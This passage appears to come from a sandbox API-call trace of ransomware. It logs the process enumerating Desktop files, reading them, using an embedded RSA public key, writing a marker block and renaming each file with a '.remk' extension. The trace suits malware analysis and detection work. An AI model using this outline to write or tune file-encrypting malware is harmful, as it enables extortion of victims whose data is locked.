Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.482] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.482] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.482] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.482] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.482] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x16110) returned 0x37c2278 [0231.482] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0231.482] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0231.482] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0231.482] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.482] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0231.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0231.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c15f0 [0231.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede60 [0231.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c1638 [0231.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede78 [0231.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edea8 [0231.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edf08 [0231.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edec0 [0231.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0231.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0231.483] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.483] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edea8 | out: hHeap=0x630000) returned 1 [0231.483] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edec0 | out: hHeap=0x630000) returned 1 [0231.483] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edf08 | out: hHeap=0x630000) returned 1 [0231.483] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0231.483] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edf08 [0231.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0231.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edec0 [0231.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0231.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31edea8 [0231.483] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0231.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0231.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0231.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0231.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0231.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0231.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0231.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0231.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edec0 | out: hHeap=0x630000) returned 1 [0231.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0231.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edea8 | out: hHeap=0x630000) returned 1 [0231.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0231.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edf08 | out: hHeap=0x630000) returned 1 [0231.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0231.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0231.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0231.484] GetCurrentThreadId () returned 0x314 [0231.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0231.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x697a38 [0231.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0231.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0231.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0231.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0231.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.485] GetCurrentThreadId () returned 0x314 [0231.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0231.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0231.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0231.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5968 [0231.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0231.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edf08 [0231.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0231.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0231.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0231.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0231.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0231.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edea8 [0231.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0231.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0231.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0231.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0231.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edec0 [0231.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0231.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0231.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0231.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede90 [0231.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0231.487] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x16114, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.487] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.487] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.487] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.487] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.488] CloseHandle (hObject=0x640) returned 1 [0231.489] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Pqz2j.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pqz2j.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Pqz2j.flv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pqz2j.flv.remk")) returned 1 [0231.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0231.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.491] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0231.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693330 | out: hHeap=0x630000) returned 1 [0231.493] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x906e6a0, ftCreationTime.dwHighDateTime=0x1d5d878, ftLastAccessTime.dwLowDateTime=0xfef25eb0, ftLastAccessTime.dwHighDateTime=0x1d5dc32, ftLastWriteTime.dwLowDateTime=0xfef25eb0, ftLastWriteTime.dwHighDateTime=0x1d5dc32, nFileSizeHigh=0x0, nFileSizeLow=0x7d61, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QJ1Ktf1WXPHih.rtf", cAlternateFileName="QJ1KTF~1.RTF")) returned 1 [0231.493] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QJ1Ktf1WXPHih.rtf") returned=".rtf" [0231.493] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QJ1Ktf1WXPHih.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qj1ktf1wxphih.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.493] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=32097) returned 1 [0231.493] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.496] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x7d3b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.496] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.498] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x7d61, lpOverlapped=0x0) returned 1 [0231.499] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.499] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.499] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.499] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.500] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.500] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.500] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.500] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.500] GetLastError () returned 0x0 [0231.500] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.500] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0231.500] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.500] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.500] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.501] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edec0 | out: hHeap=0x630000) returned 1 [0231.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eded8 | out: hHeap=0x630000) returned 1 [0231.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edf20 | out: hHeap=0x630000) returned 1 [0231.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0231.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edf20 [0231.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0231.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31eded8 [0231.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0231.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31edec0 [0231.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0231.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0231.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0231.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0231.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0231.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0231.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0231.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eded8 | out: hHeap=0x630000) returned 1 [0231.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0231.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edec0 | out: hHeap=0x630000) returned 1 [0231.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0231.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edf20 | out: hHeap=0x630000) returned 1 [0231.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0231.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0231.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0231.502] GetCurrentThreadId () returned 0x314 [0231.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0231.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x697ac8 [0231.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0231.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0231.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0231.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0231.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0231.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.502] GetCurrentThreadId () returned 0x314 [0231.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0231.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0231.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0231.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5968 [0231.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0231.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0231.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edf20 [0231.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0231.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0231.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0231.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0231.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0231.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edec0 [0231.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0231.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0231.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0231.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0231.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eded8 [0231.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0231.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0231.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0231.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edea8 [0231.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0231.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edf38 [0231.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0231.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0231.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edf08 [0231.504] HeapFree (in: 